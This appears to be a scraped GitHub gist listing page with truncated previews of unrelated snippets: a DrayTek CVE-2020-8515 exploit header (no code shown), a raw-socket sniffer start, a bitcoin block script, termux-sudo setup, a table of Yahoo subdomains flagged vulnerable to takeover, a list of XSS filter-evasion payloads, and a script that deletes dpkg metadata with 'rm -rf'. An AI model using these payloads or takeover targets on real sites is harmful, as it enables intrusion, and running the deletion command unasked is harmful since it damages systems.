This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
CVE-2020-8515: DrayTek pre-auth remote root RCE | |
Mon Mar 30 2020 - 0xsha.io | |
Affected: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
import struct | |
# creating a rawSocket for communications | |
# PF_SOCKET (packet interface), SOCK_RAW (Raw socket) - htons (protocol) 0x08000 = IP Protocol | |
rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800)) | |
# deciding interface - packet sniffing and then injection |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Script to generate a new block every minute | |
# Put this script at the root of your unpacked folder | |
#!/bin/bash | |
echo "Generating a block every minute. Press [CTRL+C] to stop.." | |
address=`./bin/bitcoin-cli getnewaddress` | |
while : | |
do |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt install git | |
git clone https://gitlab.com/st42/termux-sudo | |
cd termux-sudo | |
cat sudo > /data/data/com.termux/files/usr/bin/sudo | |
chmod 700 /data/data/com.termux/files/usr/bin/sudo |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Domain | Cname | Provider | IsVulnerable | IsTakenOver | Response | |
---|---|---|---|---|---|---|
actapi.corp.yahoo.com | actapi-omega.corp.yahoodns.net. | true | false | Dead DNS record | ||
admin.ckms.yahoo.com | admin.ckms.a04.yahoodns.net. | true | false | Dead DNS record | ||
admindb.blackbird.ah.yahoo.com | admin.blb.abuse.a03.yahoodns.net. | true | false | Dead DNS record | ||
admin.realestate.yahoo.com | cc.realestate.a1.b.yahoo.com. | true | false | Dead DNS record | ||
admin.nuwa.search.yahoo.com | admin.nuwa.search.g04.yahoodns.net. | true | false | Dead DNS record | ||
admintool-usintl.messages.yahoo.com | mb-nf.a01.yahoodns.net. | true | false | Dead DNS record | ||
adminui.blackbird.ah.yahoo.com | admin.blb.abuse.a03.yahoodns.net. | true | false | Dead DNS record | ||
admin.yhs.search.yahoo.com | admin2.yhs.search.a04.yahoodns.net. | true | false | Dead DNS record | ||
admin.yahoo.com | admin.my.lga1.b.yahoo.com. | true | false | Dead DNS record |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hi All! | |
I've recently launched a tool that wraps many of the commands here with a user interface. This desktop application is currently available for macOS. There's a roadmap outlining planned features for the near future. | |
Feel free to request any features you'd like to see, and I'll prioritize them accordingly. | |
One of the most important aspects of this application is that every command executed behind the scenes is displayed in a special log section. This allows you to see exactly what’s happening and learn from it. | |
Here's the link to the repository: https://github.com/Pulimet/ADBugger | |
App Description: | |
ADBugger is a desktop tool designed for debugging and QA of Android devices and emulators. It simplifies testing, debugging, and performance analysis by offering device management, automated testing, log analysis, and remote control capabilities. This ensures smooth app performance across various setups. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
sudo rm -rf /var/lib/dpkg/info/*.* | |
sudo apt-get autoremove | |
sudo apt-get autoclean | |
sudo apt-get update | |
sudo apt-get check | |
sudo apt-get -f install | |
sudo apt-get upgrade |
NewerOlder